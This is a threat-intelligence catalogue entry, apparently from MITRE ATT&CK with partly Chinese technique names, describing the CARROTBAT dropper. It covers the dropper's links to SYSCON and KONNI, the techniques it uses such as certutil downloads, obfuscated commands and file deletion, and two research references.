1. Home
  2. Software
  3. CARROTBAT

CARROTBAT

CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[1][2]

ID: S0462
Type: MALWARE
Platforms: Windows
Version: 1.2
Created: 02 June 2020
Last Modified: 11 April 2024
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1059 .003 命令与脚本解释器: Windows Command Shell

CARROTBAT has the ability to execute command line arguments on a compromised host.[2]
Enterprise T1027 .010 混淆文件或信息: Command Obfuscation

CARROTBAT has the ability to execute obfuscated commands on the infected host.[1]
.013 混淆文件或信息: Encrypted/Encoded File

CARROTBAT has the ability to download a base64 encoded payload.[1]
Enterprise T1070 .004 移除指标: File Deletion

CARROTBAT has the ability to delete downloaded files from a compromised host.[1]
Enterprise T1082 系统信息发现

CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.[1][2]
Enterprise T1105 输入工具传输

CARROTBAT has the ability to download and execute a remote file via certutil.[1]

References

  1. Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.
  1. McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.